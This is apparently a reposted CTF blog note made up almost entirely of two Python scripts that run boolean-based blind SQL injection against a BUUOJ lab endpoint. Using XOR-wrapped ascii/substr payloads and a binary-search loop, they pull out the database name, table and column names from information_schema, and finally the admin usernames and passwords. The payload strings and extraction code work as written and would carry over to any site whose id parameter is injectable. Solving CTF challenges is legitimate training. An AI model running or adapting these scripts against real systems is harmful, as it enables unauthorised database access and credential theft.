Notes on a boolean-based blind SQL injection script (the page either contains "title" or not, depending on whether the injected comparison holds)
2022-04-23 04:38:00 【-Gardenia blue-】
import requests
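# Target: a disposable CTF lab instance (node4.buuoj.cn).  Every probe below is a
# boolean-based blind SQL injection against the `id` parameter of this endpoint.
url = 'http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php'
database = ""

# Probe templates, one per extraction stage.  Each is formatted with
# (position, threshold) and asks "is the byte at `position` greater than
# `threshold`?".  `1^(cond)^1` collapses to `cond`, so the id=1 record (whose
# page contains "title") is served exactly when the comparison holds.
payload1 = "?id=1^(ascii(substr((select(database())),{},1))>{})^1"  # database name (author found: news)
payload2 = "?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='news')),{},1))>{})^1"  # tables (author found: admin,contents)
payload3 = "?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{},1))>{})^1"  # columns of admin (author's note says flag,value; payload4 selects id/username/password — verify)
payload4 = "?id=1^(ascii(substr((select(group_concat(id,0x3a,username,0x3a,password))from(admin)),{},1))>{})^1"  # dump admin rows as id:username:password

# Byte-value search window (inclusive).  A value the oracle never places strictly
# inside the window collapses onto a bound; past the end of the string the
# server-side ascii() presumably yields 0/NULL (MySQL semantics — the probes
# target information_schema), which never satisfies "> threshold", so hitting a
# bound marks end of data rather than a character.  This replaces the original
# stop on 32/128: 32 is a space, a legitimate byte in usernames/passwords, and
# stopping on it silently truncated the dump.
LOW = 28
HIGH = 137
TIMEOUT = 10  # seconds; without it one stalled connection hangs the whole loop


def oracle(template, position, threshold):
    """Send one probe and report whether the injected comparison held.

    Args:
        template: one of payload1..payload4.
        position: 1-based byte position passed to substr().
        threshold: ASCII value the byte is compared against.

    Returns:
        True when the id=1 page (containing "title") came back, i.e. the byte at
        `position` is greater than `threshold`.

    Raises:
        requests.RequestException on network failure or timeout (left to the
        caller; a dead lab instance should abort the run, not be retried blindly).
    """
    r = requests.get(url + template.format(position, threshold), timeout=TIMEOUT)
    return "title" in r.text


def find_byte(is_greater, low=LOW, high=HIGH):
    """Binary-search a byte value using `is_greater(threshold) -> bool`.

    Invariant: for a value inside [low, high] the value stays within the
    shrinking window; on exit low == high is the value.  A value outside the
    window collapses onto the nearest bound instead.
    """
    while low < high:
        mid = (low + high) // 2
        if is_greater(mid):
            low = mid + 1
        else:
            high = mid
    return low


def extract(template, ask=oracle, low=LOW, high=HIGH):
    """Recover the string selected by `template` one byte at a time.

    Args:
        template: probe template (payload1..payload4).
        ask: oracle callable (template, position, threshold) -> bool.  Defaults
            to the live HTTP oracle; inject a fake for offline testing.
        low, high: search window, see LOW/HIGH.

    Returns:
        The recovered string.  Extraction stops at the first position whose
        value collapses onto a bound (end of data, or a byte the window cannot
        represent); the partial result is printed after every byte.
    """
    found = ""
    for position in range(1, 10000):
        value = find_byte(lambda t: ask(template, position, t), low, high)
        if value in (low, high):
            break
        found += chr(value)
        print(found)
    return found


if __name__ == "__main__":
    # Stage 4: dump the admin rows.  Swap in payload1..payload3 for the earlier stages.
    database = extract(payload4)
    print(database)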
import time
import re
import requests
import string
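# Target: a disposable CTF lab instance (node4.buuoj.cn); the `id` parameter is
# injectable and the page contains "title" only when the injected condition holds.
url = "http://46206bf0-67f6-43a5-ac69-5d26d094e942.node4.buuoj.cn:81/backend/content_detail.php"
flag = ''

# Inclusive search window for ord() values.  A byte the oracle never places
# strictly inside the window is either end-of-data (past the end of the string
# the server-side ord() presumably yields 0/NULL — MySQL semantics, given the
# information_schema probes — which never satisfies "> j") or a byte the window
# cannot decode; both stop the extraction.
LOW = 31
HIGH = 127
TIMEOUT = 10  # seconds; a stalled connection would otherwise hang the run
DELAY = 0.2  # seconds between probes; keeps the shared lab instance responsive


def payload(i, j):
    """Boolean-blind oracle: is ord() of byte `i` of the admin dump greater than `j`?

    Args:
        i: 1-based position into the group_concat() result.
        j: threshold compared against ord() of that byte.

    Returns:
        1 when the id=1 page (containing "title") came back, i.e. the
        comparison held; 0 otherwise.

    Raises:
        requests.RequestException on network failure or timeout.
    """
    time.sleep(DELAY)
    # Earlier stages, kept for reference (swap one in to re-run that stage):
    # database names:
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # table names (author found: admin, contents):
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),%d,1))>%d)^1"%(i,j)
    # column names of admin:
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))>%d)^1"%(i,j)
    # Final stage: username:password rows from admin.
    sql = "1^(ord(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))>%d)^1" % (i, j)
    # params= lets requests URL-encode the probe, so characters such as '^' and
    # quotes reach the server intact.
    r = requests.get(url, params={"id": sql}, timeout=TIMEOUT)
    return 1 if "title" in r.text else 0


def exp(ask=None):
    """Extract the target string byte by byte and accumulate it in the global `flag`.

    Args:
        ask: oracle callable (i, j) -> truthy when byte i is greater than j.
            Defaults to the live HTTP oracle `payload`; inject a fake to test offline.

    Returns:
        The accumulated `flag` (also printed after every byte).  Stops at the
        first position whose value does not land strictly inside (LOW, HIGH):
        end of data, or a byte (>= HIGH) the window cannot decode — the original
        only stopped on exactly 127 and appended chr(128) for anything larger.
    """
    global flag
    if ask is None:
        ask = payload
    for i in range(1, 10000):
        print(i, ':')
        low, high = LOW, HIGH
        while low <= high:
            mid = (low + high) // 2
            if ask(i, mid):
                low = mid + 1
            else:
                high = mid - 1
        # The loop exits with high == low - 1, so low is the smallest threshold
        # the byte is NOT greater than: the byte value itself.
        f = low
        if f <= LOW or f >= HIGH:
            break
        flag += chr(f)
        print(flag)
    return flag


if __name__ == "__main__":
    exp()
    print('flag=', flag)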
版权声明
本文为[-Gardenia blue-]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204230403290555.html